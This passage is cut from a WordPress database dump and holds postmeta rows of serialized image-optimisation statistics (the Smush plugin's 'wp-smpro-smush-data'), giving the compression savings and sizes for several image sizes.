4:\"time\";d:0.0299999999999999988897769753748434595763683319091796875;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:7.67999999999999971578290569595992565155029296875;s:5:\"bytes\";i:7576;s:11:\"size_before\";i:98687;s:10:\"size_after\";i:91111;s:4:\"time\";d:0.059999999999999997779553950749686919152736663818359375;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:7.6500000000000003552713678800500929355621337890625;s:5:\"bytes\";i:4734;s:11:\"size_before\";i:61861;s:10:\"size_after\";i:57127;s:4:\"time\";d:0.040000000000000000832667268468867405317723751068115234375;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:9.7200000000000006394884621840901672840118408203125;s:5:\"bytes\";i:14750;s:11:\"size_before\";i:151742;s:10:\"size_after\";i:136992;s:4:\"time\";d:0.11000000000000000055511151231257827021181583404541015625;}}}'),(4329,1927,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:5.9446817388248991420596212265081703662872314453125;s:5:\"bytes\";i:16242;s:11:\"size_before\";i:273219;s:10:\"size_after\";i:256977;s:4:\"time\";d:0.309999999999999997779553950749686919152736663818359375;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:4:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:15.910000000000000142108547152020037174224853515625;s:5:\"bytes\";i:4916;s:11:\"size_before\";i:30897;s:10:\"size_after\";i:25981;s:4:\"time\";d:0.0299999999999999988897769753748434595763683319091796875;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:2.270000000000000017763568394002504646778106689453125;s:5:\"bytes\";i:1700;s:11:\"size_before\";i:74764;s:10:\"size_after\";i:73064;s:4:\"time\";d:0.0899999999999999966693309261245303787291049957275390625;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:10.8100000000000004973799150320701301097869873046875;s:5:\"bytes\";i:5951;s:11:\"size_before\";i:55071;s:10:\"size_after\";i:49120;s:4:\"time\";d:0.070000000000000006661338147750939242541790008544921875;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:3.270000000000000017763568394002504646778106689453125;s:5:\"bytes\";i:3675;s:11:\"size_before\";i:112487;s:10:\"size_after\";i:108812;s:4:\"time\";d:0.11999999999999999555910790149937383830547332763671875;}}}'),(4330,1925,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:1.97666222883546094379880742053501307964324951171875;s:5:\"bytes\";i:5048;s:11:\"size_before\";i:255380;s:10:\"size_after\";i:250332;s:4:\"time\";d:0.32999999999999996003197111349436454474925994873046875;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:4:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:8.8900000000000005684341886080801486968994140625;s:5:\"bytes\";i:2465;s:11:\"size_before\";i:27727;s:10:\"size_after\";i:25262;s:4:\"time\";d:0.0299999999999999988897769753748434595763683319091796875;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:71010;s:10:\"size_after\";i:71010;s:4:\"time\";d:0.0899999999999999966693309261245303787291049957275390625;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:1.689999999999999946709294817992486059665679931640625;s:5:\"bytes\";i:832;s:11:\"size_before\";i:49103;s:10:\"size_after\";i:48271;s:4:\"time\";d:0.059999999999999997779553950749686919152736663818359375;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:1.62999999999999989341858963598497211933135986328125;s:5:\"bytes\";i:1751;s:11:\"size_before\";i:107540;s:10:\"size_after\";i:105789;s:4:\"time\";d:0.1499999999999999944488848768742172978818416595458984375;}}}'),(4331,1891,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:41.5326868939630884369762497954070568084716796875;s:5:\"bytes\";i:13278;s:11:\"size_before\";i:31970;s:10:\"size_after\";i:18692;s:4:\"time\";d:0.179999999999999993338661852249060757458209991455078125;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:4:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:43.67999999999999971578290569595992565155029296875;s:5:\"bytes\";i:1708;s:11:\"size_before\";i:3910;s:10:\"size_after\";i:2202;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:29.120000000000000994759830064140260219573974609375;s:5:\"bytes\";i:2288;s:11:\"size_before\";i:7856;s:10:\"size_after\";i:5568;s:4:\"time\";d:0.0299999999999999988897769753748434595763683319091796875;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:44.38000000000000255795384873636066913604736328125;s:5:\"bytes\";i:3475;s:11:\"size_before\";i:7830;s:10:\"size_after\";i:4355;s:4:\"time\";d:0.05000000000000000277555756156289135105907917022705078125;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:46.92999999999999971578290569595992565155029296875;s:5:\"bytes\";i:5807;s:11:\"size_before\";i:12374;s:10:\"size_after\";i:6567;s:4:\"time\";d:0.08000000000000000166533453693773481063544750213623046875;}}}'),(4332,1873,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:38.6268848251523877479485236108303070068359375;s:5:\"bytes\";i:72240;s:11:\"size_before\";i:187020;s:10:\"size_after\";i:114780;s:4:\"time\";d:1.640000000000000124344978758017532527446746826171875;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:7:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:35.5;s:5:\"bytes\";i:3375;s:11:\"size_before\";i:9506;s:10:\"size_after\";i:6131;s:4:\"time\";d:0.05000000000000000277555756156289135105907917022705078125;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:40.46000000000000085265128291212022304534912109375;s:5:\"bytes\";i:9196;s:11:\"size_before\";i:22728;s:10:\"size_after\";i:13532;s:4:\"time\";d:0.200000000000000011102230246251565404236316680908203125;}s:12:\"medium_large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:36.28999999999999914734871708787977695465087890625;s:5:\"bytes\";i:16296;s:11:\"size_before\";i:44910;s:10:\"size_after\";i:28614;s:4:\"time\";d:0.340000000000000024424906541753443889319896697998046875;}s:5:\"large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:36.77000000000000312638803734444081783294677734375;s:5:\"bytes\";i:10532;s:11:\"size_before\";i:28640;s:10:\"size_after\";i:18108;s:4:\"time\";d:0.330000000000000015543122344752191565930843353271484375;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:39.090000000000003410605131648480892181396484375;s:5:\"bytes\";i:7451;s:11:\"size_before\";i:19060;s:10:\"size_after\";i:11609;s:4:\"time\";d:0.1700000000000000122124532708767219446599483489990234375;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:42.1099999999999994315658113919198513031005859375;s:5:\"bytes\";i:12073;s:11:\"size_before\";i:28671;s:10:\"size_after\";i:16598;s:4:\"time\";d:0.179999999999999993338661852249060757458209991455078125;}s:15:\"onepress-medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:39.75;s:5:\"bytes\";i:13317;s:11:\"size_before\";i:33505;s:10:\"size_after\";i:20188;s:4:\"time\";d:0.36999999999999999555910790149937383830547332763671875;}}}'),(4333,1858,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:2592830;s:10:\"size_after\";i:2592830;s:4:\"time\";d:2.790000000000000479616346638067625463008880615234375;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:7:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:35221;s:10:\"size_after\";i:35221;s:4:\"time\";d:0.040000000000000000832667268468867405317723751068115234375;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:97272;s:10:\"size_after\";i:97272;s:4:\"time\";d:0.0899999999999999966693309261245303787291049957275390625;}s:12:\"medium_large\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:846039;s:10:\"size_after\";i:846039;s:4:\"time\";d:0.9499999999999999555910790149937383830547332763671875;}s:5:\"large\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:961574;s:10:\"size_after\";i:961574;s:4:\"time\";d:1.0300000000000000266453525910037569701671600341796875;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:70112;s:10:\"size_after\";i:70112;s:4:\"time\";d:0.0899999999999999966693309261245303787291049957275390625;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:213753;s:10:\"size_after\";i:213753;s:4:\"time\";d:0.2200000000000000011102230246251565404236316680908203125;}s:15:\"onepress-medium\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:368859;s:10:\"size_after\";i:368859;s:4:\"time\";d:0.36999999999999999555910790149937383830547332763671875;}}}'),(4334,1857,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:4.33840776647418824296664752182550728321075439453125;s:5:\"bytes\";i:6529;s:11:\"size_before\";i:150493;s:10:\"size_after\";i:143964;s:4:\"time\";d:0.09000000000000001054711873393898713402450084686279296875;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:6:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";i:6;s:5:\"bytes\";i:340;s:11:\"size_before\";i:5671;s:10:\"size_after\";i:5331;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:5.44000000000000039079850466805510222911834716796875;s:5:\"bytes\";i:728;s:11:\"size_before\";i:13380;s:10:\"size_after\";i:12652;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}s:12:\"medium_large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:3.87000000000000010658141036401502788066864013671875;s:5:\"bytes\";i:2163;s:11:\"size_before\";i:55844;s:10:\"size_after\";i:53681;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:5.5;s:5:\"bytes\";i:610;s:11:\"size_before\";i:11101;s:10:\"size_after\";i:10491;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:4.29000000000000003552713678800500929355621337890625;s:5:\"bytes\";i:1085;s:11:\"size_before\";i:25291;s:10:\"size_after\";i:24206;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:15:\"onepress-medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:4.089999999999999857891452847979962825775146484375;s:5:\"bytes\";i:1603;s:11:\"size_before\";i:39206;s:10:\"size_after\";i:37603;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}}}'),(4335,1856,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:6.57066947937259993040015615406446158885955810546875;s:5:\"bytes\";i:135305;s:11:\"size_before\";i:2059227;s:10:\"size_after\";i:1923922;s:4:\"time\";d:3.20000000000000017763568394002504646778106689453125;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:7:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:29624;s:10:\"size_after\";i:29624;s:4:\"time\";d:0.0299999999999999988897769753748434595763683319091796875;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:64982;s:10:\"size_after\";i:64982;s:4:\"time\";d:0.1600000000000000033306690738754696212708950042724609375;}s:12:\"medium_large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:7.30999999999999960920149533194489777088165283203125;s:5:\"bytes\";i:53814;s:11:\"size_before\";i:736399;s:10:\"size_after\";i:682585;s:4:\"time\";d:1.229999999999999982236431605997495353221893310546875;}s:5:\"large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:7.79999999999999982236431605997495353221893310546875;s:5:\"bytes\";i:53636;s:11:\"size_before\";i:687741;s:10:\"size_after\";i:634105;s:4:\"time\";d:1.0900000000000000799360577730112709105014801025390625;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:0.729999999999999982236431605997495353221893310546875;s:5:\"bytes\";i:404;s:11:\"size_before\";i:55435;s:10:\"size_after\";i:55031;s:4:\"time\";d:0.059999999999999997779553950749686919152736663818359375;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:4.660000000000000142108547152020037174224853515625;s:5:\"bytes\";i:8394;s:11:\"size_before\";i:180111;s:10:\"size_after\";i:171717;s:4:\"time\";d:0.2200000000000000011102230246251565404236316680908203125;}s:15:\"onepress-medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:6.25;s:5:\"bytes\";i:19057;s:11:\"size_before\";i:304935;s:10:\"size_after\";i:285878;s:4:\"time\";d:0.409999999999999975575093458246556110680103302001953125;}}}'),(4336,1855,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:4.2090485093515663805874282843433320522308349609375;s:5:\"bytes\";i:12472;s:11:\"size_before\";i:296314;s:10:\"size_after\";i:283842;s:4:\"time\";d:0.1399999999999999855671006798729649744927883148193359375;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:7:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:5.67999999999999971578290569595992565155029296875;s:5:\"bytes\";i:364;s:11:\"size_before\";i:6404;s:10:\"size_after\";i:6040;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:4.339999999999999857891452847979962825775146484375;s:5:\"bytes\";i:589;s:11:\"size_before\";i:13583;s:10:\"size_after\";i:12994;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}s:12:\"medium_large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:4.04000000000000003552713678800500929355621337890625;s:5:\"bytes\";i:3717;s:11:\"size_before\";i:91952;s:10:\"size_after\";i:88235;s:4:\"time\";d:0.040000000000000000832667268468867405317723751068115234375;}s:5:\"large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:4.0800000000000000710542735760100185871124267578125;s:5:\"bytes\";i:4065;s:11:\"size_before\";i:99694;s:10:\"size_after\";i:95629;s:4:\"time\";d:0.0299999999999999988897769753748434595763683319091796875;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:5.32000000000000028421709430404007434844970703125;s:5:\"bytes\";i:585;s:11:\"size_before\";i:10995;s:10:\"size_after\";i:10410;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:4.67999999999999971578290569595992565155029296875;s:5:\"bytes\";i:1320;s:11:\"size_before\";i:28221;s:10:\"size_after\";i:26901;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:15:\"onepress-medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:4.03000000000000024868995751603506505489349365234375;s:5:\"bytes\";i:1832;s:11:\"size_before\";i:45465;s:10:\"size_after\";i:43633;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}}}'),(4337,1845,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:29.040105072329719604340425576083362102508544921875;s:5:\"bytes\";i:62794;s:11:\"size_before\";i:216232;s:10:\"size_after\";i:153438;s:4:\"time\";d:1.5799999999999998490096686509787105023860931396484375;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:7:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:25.550000000000000710542735760100185871124267578125;s:5:\"bytes\";i:2517;s:11:\"size_before\";i:9852;s:10:\"size_after\";i:7335;s:4:\"time\";d:0.070000000000000006661338147750939242541790008544921875;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:31.89999999999999857891452847979962825775146484375;s:5:\"bytes\";i:7674;s:11:\"size_before\";i:24059;s:10:\"size_after\";i:16385;s:4:\"time\";d:0.179999999999999993338661852249060757458209991455078125;}s:12:\"medium_large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:26.019999999999999573674358543939888477325439453125;s:5:\"bytes\";i:12686;s:11:\"size_before\";i:48759;s:10:\"size_after\";i:36073;s:4:\"time\";d:0.419999999999999984456877655247808434069156646728515625;}s:5:\"large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:28.89999999999999857891452847979962825775146484375;s:5:\"bytes\";i:12677;s:11:\"size_before\";i:43867;s:10:\"size_after\";i:31190;s:4:\"time\";d:0.429999999999999993338661852249060757458209991455078125;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:30.699999999999999289457264239899814128875732421875;s:5:\"bytes\";i:6253;s:11:\"size_before\";i:20367;s:10:\"size_after\";i:14114;s:4:\"time\";d:0.11000000000000000055511151231257827021181583404541015625;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:31.559999999999998721023075631819665431976318359375;s:5:\"bytes\";i:9993;s:11:\"size_before\";i:31661;s:10:\"size_after\";i:21668;s:4:\"time\";d:0.1700000000000000122124532708767219446599483489990234375;}s:15:\"onepress-medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:29.190000000000001278976924368180334568023681640625;s:5:\"bytes\";i:10994;s:11:\"size_before\";i:37667;s:10:\"size_after\";i:26673;s:4:\"time\";d:0.200000000000000011102230246251565404236316680908203125;}}}'),(4338,1844,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:3.212600132031411703792400658130645751953125;s:5:\"bytes\";i:13042;s:11:\"size_before\";i:405964;s:10:\"size_after\";i:392922;s:4:\"time\";d:1.2800000000000000266453525910037569701671600341796875;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:7:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:14.0099999999999997868371792719699442386627197265625;s:5:\"bytes\";i:1805;s:11:\"size_before\";i:12880;s:10:\"size_after\";i:11075;s:4:\"time\";d:0.05000000000000000277555756156289135105907917022705078125;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:15.8599999999999994315658113919198513031005859375;s:5:\"bytes\";i:5047;s:11:\"size_before\";i:31819;s:10:\"size_after\";i:26772;s:4:\"time\";d:0.1700000000000000122124532708767219446599483489990234375;}s:12:\"medium_large\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:95346;s:10:\"size_after\";i:95346;s:4:\"time\";d:0.299999999999999988897769753748434595763683319091796875;}s:5:\"large\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:118351;s:10:\"size_after\";i:118351;s:4:\"time\";d:0.289999999999999980015985556747182272374629974365234375;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:12.339999999999999857891452847979962825775146484375;s:5:\"bytes\";i:3471;s:11:\"size_before\";i:28136;s:10:\"size_after\";i:24665;s:4:\"time\";d:0.0899999999999999966693309261245303787291049957275390625;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:5.38999999999999968025576890795491635799407958984375;s:5:\"bytes\";i:2719;s:11:\"size_before\";i:50447;s:10:\"size_after\";i:47728;s:4:\"time\";d:0.1700000000000000122124532708767219446599483489990234375;}s:15:\"onepress-medium\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:68985;s:10:\"size_after\";i:68985;s:4:\"time\";d:0.2099999999999999922284388276239042170345783233642578125;}}}'),(4339,1843,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:26.891428655318460272383163101039826869964599609375;s:5:\"bytes\";i:73270;s:11:\"size_before\";i:272466;s:10:\"size_after\";i:199196;s:4:\"time\";d:1.5500000000000000444089209850062616169452667236328125;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:7:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:32.50999999999999801048033987171947956085205078125;s:5:\"bytes\";i:4198;s:11:\"size_before\";i:12912;s:10:\"size_after\";i:8714;s:4:\"time\";d:0.070000000000000006661338147750939242541790008544921875;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:34.85000000000000142108547152020037174224853515625;s:5:\"bytes\";i:9904;s:11:\"size_before\";i:28419;s:10:\"size_after\";i:18515;s:4:\"time\";d:0.2200000000000000011102230246251565404236316680908203125;}s:12:\"medium_large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:23.8299999999999982946974341757595539093017578125;s:5:\"bytes\";i:14911;s:11:\"size_before\";i:62583;s:10:\"size_after\";i:47672;s:4:\"time\";d:0.270000000000000017763568394002504646778106689453125;}s:5:\"large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:14.32000000000000028421709430404007434844970703125;s:5:\"bytes\";i:8220;s:11:\"size_before\";i:57390;s:10:\"size_after\";i:49170;s:4:\"time\";d:0.330000000000000015543122344752191565930843353271484375;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:34.28999999999999914734871708787977695465087890625;s:5:\"bytes\";i:8617;s:11:\"size_before\";i:25129;s:10:\"size_after\";i:16512;s:4:\"time\";d:0.190000000000000002220446049250313080847263336181640625;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:36.67999999999999971578290569595992565155029296875;s:5:\"bytes\";i:14523;s:11:\"size_before\";i:39596;s:10:\"size_after\";i:25073;s:4:\"time\";d:0.2099999999999999922284388276239042170345783233642578125;}s:15:\"onepress-medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:27.769999999999999573674358543939888477325439453125;s:5:\"bytes\";i:12897;s:11:\"size_before\";i:46437;s:10:\"size_after\";i:33540;s:4:\"time\";d:0.2600000000000000088817841970012523233890533447265625;}}}'),(4340,1842,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:32.61661951444174434300293796695768833160400390625;s:5:\"bytes\";i:74361;s:11:\"size_before\";i:227985;s:10:\"size_after\";i:153624;s:4:\"time\";d:1.560000000000000053290705182007513940334320068359375;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:7:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:33.57000000000000028421709430404007434844970703125;s:5:\"bytes\";i:3623;s:11:\"size_before\";i:10793;s:10:\"size_after\";i:7170;s:4:\"time\";d:0.059999999999999997779553950749686919152736663818359375;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:36.67999999999999971578290569595992565155029296875;s:5:\"bytes\";i:9181;s:11:\"size_before\";i:25033;s:10:\"size_after\";i:15852;s:4:\"time\";d:0.1700000000000000122124532708767219446599483489990234375;}s:12:\"medium_large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:29.699999999999999289457264239899814128875732421875;s:5:\"bytes\";i:15988;s:11:\"size_before\";i:53832;s:10:\"size_after\";i:37844;s:4:\"time\";d:0.36999999999999999555910790149937383830547332763671875;}s:5:\"large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:25.42999999999999971578290569595992565155029296875;s:5:\"bytes\";i:10360;s:11:\"size_before\";i:40745;s:10:\"size_after\";i:30385;s:4:\"time\";d:0.419999999999999984456877655247808434069156646728515625;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:35.61999999999999744204615126363933086395263671875;s:5:\"bytes\";i:7605;s:11:\"size_before\";i:21350;s:10:\"size_after\";i:13745;s:4:\"time\";d:0.14000000000000001332267629550187848508358001708984375;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:38.57000000000000028421709430404007434844970703125;s:5:\"bytes\";i:13577;s:11:\"size_before\";i:35201;s:10:\"size_after\";i:21624;s:4:\"time\";d:0.2399999999999999911182158029987476766109466552734375;}s:15:\"onepress-medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:34.18999999999999772626324556767940521240234375;s:5:\"bytes\";i:14027;s:11:\"size_before\";i:41031;s:10:\"size_after\";i:27004;s:4:\"time\";d:0.1600000000000000033306690738754696212708950042724609375;}}}'),(4341,1841,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:22.316494213199536744696160894818603992462158203125;s:5:\"bytes\";i:57866;s:11:\"size_before\";i:259297;s:10:\"size_after\";i:201431;s:4:\"time\";d:1.5300000000000000266453525910037569701671600341796875;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:7:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:26.449999999999999289457264239899814128875732421875;s:5:\"bytes\";i:2624;s:11:\"size_before\";i:9919;s:10:\"size_after\";i:7295;s:4:\"time\";d:0.070000000000000006661338147750939242541790008544921875;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:30.5;s:5:\"bytes\";i:7441;s:11:\"size_before\";i:24394;s:10:\"size_after\";i:16953;s:4:\"time\";d:0.14000000000000001332267629550187848508358001708984375;}s:12:\"medium_large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:20.17999999999999971578290569595992565155029296875;s:5:\"bytes\";i:12668;s:11:\"size_before\";i:62766;s:10:\"size_after\";i:50098;s:4:\"time\";d:0.35999999999999998667732370449812151491641998291015625;}s:5:\"large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:9.5999999999999996447286321199499070644378662109375;s:5:\"bytes\";i:5790;s:11:\"size_before\";i:60334;s:10:\"size_after\";i:54544;s:4:\"time\";d:0.409999999999999975575093458246556110680103302001953125;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:27.6700000000000017053025658242404460906982421875;s:5:\"bytes\";i:5765;s:11:\"size_before\";i:20834;s:10:\"size_after\";i:15069;s:4:\"time\";d:0.14000000000000001332267629550187848508358001708984375;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:32.780000000000001136868377216160297393798828125;s:5:\"bytes\";i:11982;s:11:\"size_before\";i:36557;s:10:\"size_after\";i:24575;s:4:\"time\";d:0.190000000000000002220446049250313080847263336181640625;}s:15:\"onepress-medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:26.059999999999998721023075631819665431976318359375;s:5:\"bytes\";i:11596;s:11:\"size_before\";i:44493;s:10:\"size_after\";i:32897;s:4:\"time\";d:0.2200000000000000011102230246251565404236316680908203125;}}}'),(4342,1840,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:19.104203345635223598719676374457776546478271484375;s:5:\"bytes\";i:37219;s:11:\"size_before\";i:194821;s:10:\"size_after\";i:157602;s:4:\"time\";d:1.5000000000000002220446049250313080847263336181640625;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:7:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:25.3900000000000005684341886080801486968994140625;s:5:\"bytes\";i:2288;s:11:\"size_before\";i:9012;s:10:\"size_after\";i:6724;s:4:\"time\";d:0.059999999999999997779553950749686919152736663818359375;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:32.71000000000000085265128291212022304534912109375;s:5:\"bytes\";i:7271;s:11:\"size_before\";i:22227;s:10:\"size_after\";i:14956;s:4:\"time\";d:0.14000000000000001332267629550187848508358001708984375;}s:12:\"medium_large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:15.32000000000000028421709430404007434844970703125;s:5:\"bytes\";i:6863;s:11:\"